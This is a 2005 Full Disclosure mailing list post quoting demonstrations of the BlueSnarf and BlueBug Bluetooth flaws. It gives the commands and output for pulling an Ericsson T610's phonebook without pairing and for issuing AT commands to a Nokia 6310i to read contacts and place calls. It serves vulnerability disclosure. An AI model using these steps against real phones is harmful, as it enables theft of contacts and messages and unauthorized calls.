Full Disclosure mailing list archives

Re: Re: Bluetooth: BlueSnarf and BlueBug Full Disclusore

From: Scott Renna <srenna () vdbmusic com>
Date: Sun, 09 Jan 2005 19:04:49 -0500

When I saw Adam's announcement a while back on these issues, I wrote a paper up for SANS. Describes running the attack on FreeBSD based system against a T610. Check out:

http://www.giac.org/practical/GCIA/Scott_Renna_GCIA.pdf

Eric Detoisien wrote:
An easy way to get phonebook on Ericsson T610 via bluetooth without pairing  :

tough:~# hcitool scan
 Scanning ...
        00:0A:D9:XX:XX:XX       T610

tough:~# sdptool browse 00:0A:D9:XX:XX:XX
 Browsing 00:0A:D9:XX:XX:XX ...
[...]
Service Name: OBEX Object Push
 Service RecHandle: 0x10005
 Service Class ID List:
   "OBEX Object Push" (0x1105)
 Protocol Descriptor List:
   "L2CAP" (0x0100)
   "RFCOMM" (0x0003)
     Channel: 10 -----------------------> only RFCOMM channels 10 and 15 are open
   "OBEX" (0x0008)
 Profile Descriptor List:
   "OBEX Object Push" (0x1105)
     Version: 0x0100
[...]
Service Name: OBEX Basic Imaging
 Service RecHandle: 0x1000b
 Service Class ID List:
   "" (0x111b)
 Protocol Descriptor List:
   "L2CAP" (0x0100)
   "RFCOMM" (0x0003)
     Channel: 15
   "OBEX" (0x0008)
 Profile Descriptor List:
   "" (0x111a)
     Version: 0x0100
[...]

tough:~# obexftp -b 00:0A:D9:XX:XX:XX -B 10 -g telecom/pb.vcf Browsing 00:0A:D9:FA:03:B7 ...
 Channel: 7
 No custom transport
 Connecting...bt: 1
 done
 Receiving telecom/pb.vcf.../done
 Disconnecting...done

Eric Detoisien

The Bluebug, as described on [1] is trivially exploitable on some non-Symbian
Nokia phones. It allows attacker to create serial profile connection without
pairing or asking for permission, therefore it gives unauthorized access to all
AT commands. It is possible to read/delete/send SMS messages, add/view/delete
phonebook entries, change call diverts, initiate voice or data call.

Demonstration on Nokia 6310i:

laptop:~# hcitool scan
Scanning ...
        00:60:57:38:8C:D8       Nokia 6310i
laptop:~# rfcomm bind /dev/rfcomm0 00:60:57:38:8C:D8 17

Now you can use plain AT commands, as described in manual [2] or Gnokii [3], for
example:

laptop:~# cu -l rfcomm0 -s 9600
Connected.
[ATE1]
OK
ATI
Nokia

OK
AT+CPBS?
+CPBS: "SM",0,100

OK
AT+CPBR=?
+CPBR: (1-100),48,18

OK
ATDT+48609xxxxxx
OK

As you can see, the bug is really trivial and looks rather like backdoor.

[1] - http://www.thebunker.net/security/bluetooth.htm
[2] - http://ncsp.forum.nokia.com/download/?asset_id=11579;ref=devx
[3] - http://www.gnokii.org/

Full-Disclosure - We believe in it.